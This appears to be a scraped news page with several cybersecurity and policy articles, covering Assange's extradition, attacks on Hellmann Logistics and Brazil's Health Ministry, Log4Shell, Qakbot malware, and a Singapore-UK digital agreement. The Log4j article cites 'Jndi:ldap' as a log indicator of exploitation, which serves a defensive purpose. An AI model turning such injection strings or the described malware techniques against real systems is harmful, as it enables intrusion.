Eliana Willis

A UK High Court has approved the extradition of WikiLeaks founder Julian Assange to the US. 

ZDNet Recommends

Assange has been wanted by US authorities since the early 2010s for his role in acquiring and disseminating military and diplomatic documents via the WikiLeaks website. Following a long stint at Ecuador’s embassy in London, he was finally arrested in 2019, when his asylum was revoked. He has been indicted on 18 criminal counts, including 17 espionage charges. The collective maximum sentence for all charges comes to 175 years, but the US government has indicated that the actual imprisonment would be far, far shorter. This decision follows an earlier ruling made in January 2021, which denied the US request based on the court’s perception that it posed too great a risk to Assange’s wellbeing. The judge forbade the extradition due to “a recurrent depressive disorder which was severe in December 2019 and sometimes accompanied by psychotic features (hallucinations), often with ruminative suicidal ideas.” The new ruling takes concerns over Assange’s mental health into account, but it also integrates a series of four “assurances” made by US officials. These include: a promise that Assange will never be held under any “special administrative measures”; a commitment to never house him within a maximum security prison; a guarantee that he will be allowed to serve his final sentence in his native Australia, if he wishes; and a commitment to provide him with “appropriate clinical and psychological treatment as recommended by a qualified treating clinician at the prison where he is held.” Assange’s fiancée, Stella Morris, was outraged by the decision, telling the UK’s Sky News that his legal counsel intended to appeal the decision “at the earliest possible moment.” She called the repeal a “grave miscarriage of justice,” asking how the UK could allow him to be sent to a country that “plotted to kill him.” This final accusation likely relates to reporting from earlier this year, which claims that the Trump administration explored the possibility of forcibly kidnapping or assassinating Assange in 2017. The US government has never officially commented on this report. Assange remains a controversial figure, with organizations like Amnesty International and individuals like Edward Snowden still calling for his release based on concerns over preserving freedom of speech and the arrest’s chilling effect on investigative journalism. The US government, however, has never wavered in its stance that the WikiLeaks founder’s actions were criminal in nature, putting lives at risk by divulging classified information to enemies of the US. 

Assange’s legal team now has 14 days to file their appeal, which will delay any extradition proceedings until that filing is subsequently resolved. 

Government More

Billion-dollar logistics firm Hellmann Worldwide Logistics reported a cyberattack this week that forced them to temporarily remove all connections to their central data center. The company said the shut down was having a “material impact” on their business operations. 

ZDNet Recommends

The German company operates in 173 countries, running logistics for a range of air and sea freights as well as rail and road transportation services. Air Cargo News, which first reported the attack, said the company had a revenue of nearly $3 billion last year.In a statement, Hellmann said its Global Crisis Taskforce discovered the attack but outside cybersecurity experts were brought in to help with the response. “Operations will be restored step by step, with the security and integrity of the systems as the top priority,” reads the statement.The statement does not say if they were suffering from a ransomware attack, and the company did not respond to requests for comment. This is a particularly inopportune time for a global logistics firm like Hellmann to suffer from a cyberattack considering the role it plays in the global supply chain, explained Nasser Fattah, North America steering committee chair at Shared Assessments.  “Today, the movement of goods is a global process that requires a concerted effort because the supply chain may include transportation, shipping, receiving, storage, and management of goods,” Fattah said. 

“The slightest kink in the chain can cause the business to suffer simply because of untimely deliveries. And businesses know that implementing seamless logistics is essential to keep pace with customer demands and remain competitive.” More

Websites under Brazil’s Ministry of Health (MoH) have suffered a major ransomware attack that resulted in the unavailability of COVID-19 vaccination data of millions of citizens. Following that attack that took place at around 1 am today, all of MoH’s websites including ConecteSUS, which tracks the trajectory of citizens in the public healthcare system, became unavailable. This includes the COVID-19 digital vaccination certificate, which is available via the ConecteSUS app.

According to a message left by the Lapsus$ Group, which has claimed responsibility for the attack, some 50 TB worth of data has been extracted from the MoH’s systems and subsequently deleted. “Contact us if you want the data returned”, the message said, alongside contact details for the authors of the attack. Just before 7 am, the images with the message left by the hackers were removed, but the websites remained unavailable. The image left by the hackers claiming the Ministry of Health attack Contacted by ZDNet about the measures in place to mitigate the attack and reestablish the systems, and whether there are backups for the data allegedly stolen from its systems, the Ministry of Health has not returned requests for comment at the time of writing. The incident follows a previous attack on the Brazilian Health Regulatory Agency (Anvisa) in September. The attack was focused on the healthcare declaration for travelers, compulsory for individuals entering Brazil via airports. The attack took place soon after the cancellation of the World Cup qualifier match between Brazil and Argentina, whereby Anvisa interrupted the game after four Argentinian players were accused of breaking COVID-19 travel protocols.

Similarly, the latest issue faced by the Ministry of Health occurs amid increasing pressure on the Brazilian government to demand COVID-19 vaccination certificates from international travelers coming to Brazil, as a response to the rise of the omicron variant. This is not the first major security issue faced by Brazil’s Ministry of Health over the last few months. In November 2020, personal and health information of more than 16 million Brazilian COVID-19 patients were leaked online after a hospital employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub. Less than a week later, another major security incident emerged. The personal information of more than 243 million Brazilians, including alive and deceased, was exposed online after web developers left the password for a crucial government database inside the source code of an official MoH website for at least six months.

ZDNet Recommends More

A newly discovered zero-day vulnerability in the widely used Java logging library Apache Log4j is easy to exploit and enables attackers to gain full control of affected servers. Tracked as CVE-2021-44228, the vulnerability is classed as severe and allows unauthenticated remote code execution as the user running the application utilises the Java logging library. CERT New Zealand warns that it’s already being exploited in the wild.CISA has urged users and administrators to apply the recommended mitigations “immediately” in order to address the critical vulnerabilities. 

ZDNet Recommends

Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.14.1 are all affected, including many services and applications written in Java. SEE: A winning strategy for cybersecurity (ZDNet special report) The vulnerability was first discovered in Minecraft but researchers warn that cloud applications are also vulnerable. It’s also used in enterprise applications and it’s likely that many products will be found to be vulnerable as more is learned about the flaw. A blog post by researchers at LunaSec warns that anybody using Apache Struts is “likely vulnerable.”

LunaSec said: “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.” Organisations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected. In order to mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application. To prevent the library being exploited, it’s urgently recommended that Log4j versions are upgraded to log4j-2.15.0-rc1. “If you believe you may be impacted by CVE-2021-44228, Randori encourages all organizations to adopt an assumed breach mentality and review logs for impacted applications for unusual activity,” cybersecurity researchers at Randori wrote in a blog post. “If anomalies are found, we encourage you to assume this is an active incident, that you have been compromised and respond accordingly.”
MORE ON CYBERSECURITY More

Qakbot, a top trojan for stealing bank credentials, has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn’t a Qakbot attack. Qakbot, is an especially versatile piece of malware, and has been around for over a decade and survived despite multi-year efforts by Microsoft and other security firms to stamp it out. Qakbot in 2017 adopted WannaCry’s lateral movement techniques, such as infecting all network shares and drives, brute forcing Active Directory accounts and using the SMB file-sharing protocol to create copies of itself.   

ZDNet Recommends

Kaspersky’s recent analysis of Qakbot concluded that it won’t disappear anytime soon. Its detection statistics for Qakbot indicated it had infected 65% more PCs between January to July 2021 compared to the same period in the previous year. So, it is a growing threat.SEE: Hackers are turning to this simple technique to install their malware on PCsMicrosoft highlights that Qakbot is modular, allowing it to appear as separate attacks on each device on a network, making it difficult for defenders and security tools to detect, prevent and remove. It’s also difficult for defenders to detect because Qakbot is used to distribute multiple variants of ransomware. “Due to Qakbot’s high likelihood of transitioning to human-operated attack behaviors including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely,” the Microsoft 365 Defender Threat Intelligence Team say in its report. Given these difficulties pinpointing a common Qakbot campaign, the Microsoft team has profiled the malware’s techniques and behaviors to help security analysts root out this versatile malware. 

The primary delivery mechanism is emailed attachments, links, or embedded images. However, it’s also known to use Visual Basic for Applications (VBA) macros as well as legacy Excel 4.0 macros to infect machines. TrendMicro analyzed a large Qakbot campaign in July that used this technique. Other groups like Trickbot recently started using Excel 4.0 macros to call Win32 APIs and run shell commands. As a result, Microsoft disabled these macro types by default, but Qakbot uses text in an Excel document to trick targets into manually enabling the macro.   Qakbot employs process injection to hide malicious processes, creating scheduled tasks to persist on a machine, and manipulating the Windows registry. Once running on an infected device, it uses multiple techniques for lateral movement, employs the Cobalt Strike penetration-testing framework, or deploys ransomware. The FBI last year warned that Qakbot trojans were delivering ProLock, a “human-operated ransomware” variant. It was a worrying development because computers infected with Qakbot on a network must be isolated because they’re a bridge for a ransomware attack.Microsoft notes MSRA.exe and Mobsync.exe have been used by Qakbot for this process injection in order to run several network ‘discovery’ commands and then steal Windows credentials and browser data. Qakbot’s Cobalt Strike module lends itself to other criminal gangs who can drop their own payloads, such as ransomware. Per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor, and ProLock (2020), and Sodinokibi/REvil (2021). “Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads,” Microsoft notes. “Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor.”Microsoft’s recommended mitigations to minimize Qakbot’s impact include enabling Office 365 phishing protection, enabling SmartScreen and network in the Edge browser, and ensuring runtime macro scanning by turning Windows Antimalware Scan Interface (AMSI) on. AMSI is supported by Microsoft Defender antivirus and several third-party antivirus vendors. AMSI support for Excel 4.0 macros arrived in March, so it’s still a relatively new feature.   More

Singapore and the UK have wrapped up negotiations on a digital economy agreement that focuses on digital trade, data flows, and cybersecurity. Under the pact, both nations will look to establish, amongst others, interoperable systems for digital payments, secured data flows, and digital identities, as well as collaborate on cybersecurity. When formally inked, the digital economy agreement would be Singapore’s third following two others it signed with Chile and New Zealand as well as Australia. The UK agreement included “binding disciplines” of the digital economy such as data, and cooperation in emerging areas including artificial intelligence, fintech, digital identities, and legal technology. 

Common digital systems, for instance, would be put in place to facilitate e-payments, e-invoicing, and other electronic documents such as bills of lading. The goal here was to drive faster and cheaper transactions, reducing costs for businesses in both markets. internThe two countries also would look to enable trusted data flows and data protection for various functions, including financial services. In addition, a “trusted and secure digital environment” would be critical to drive and safeguard participation for both businesses and consumers. For example, private cryptography keys and embedded algorithms would help secure an organisation’s source codes, while consumers should be protected against fraudulent and deceptive online behaviour. For a start, government agencies from both sides last week signed three Memoranda of Understanding (MOUs) in digital trade, digital identities, and cybersecurity. Collectively, these aimed to facilitate cross-border services between Singapore and the UK, which bilateral trade services tipped at SG$22 billion ($16.02 billion) in 2019. 

Some 70% of the UK’s cross-border services exports to Singapore in 2019 also were digitally processed, totalling £3.2 billion ($4.23 billion). The UK is Singapore’s largest services trading partner in Europe and the Asian economy’s second-largest European investor and European investment destination, with more than SG$100 billion ($72.81 billion) of UK investment stock in Singapore. Under the digital trade MOU, a scheme would be piloted to simulate the transfer of electronic bills of lading, with the aim to ease cross-border trade transactions. Digitalising this process helped cut cost and transaction time as well as reduce fraud. The MOU on digital identities looked to develop mutual recognition and interoperability between both countries’ digital identity regimes. The goal here was to establish more reliable identity verification and more quickly process applications. In cybersecurity, the two nations hoped to build on a shared goal of “addressing international challenges” and promoting bilateral collaboration to bolster cybersecurity, including in Internet of Things (IoT), capacity building, and cyber resilience.Singapore’s Minister-in-charge of Trade Relations S. Iswaran said: “Singapore’s digital economy agreements build on and enhance the economic connectivity established through our extensive network of free trade agreements. Reflecting our shared ambition, the UK-Singapore Digital Economy Agreement builds upon and, in some areas, goes further than our existing agreements. It will set a global benchmark for high-standard digital trade rules and benefit people and businesses in our two countries.”Negotiations for the Singapore-UK digital trade agreement kicked off in June 2021. RELATED COVERAGE More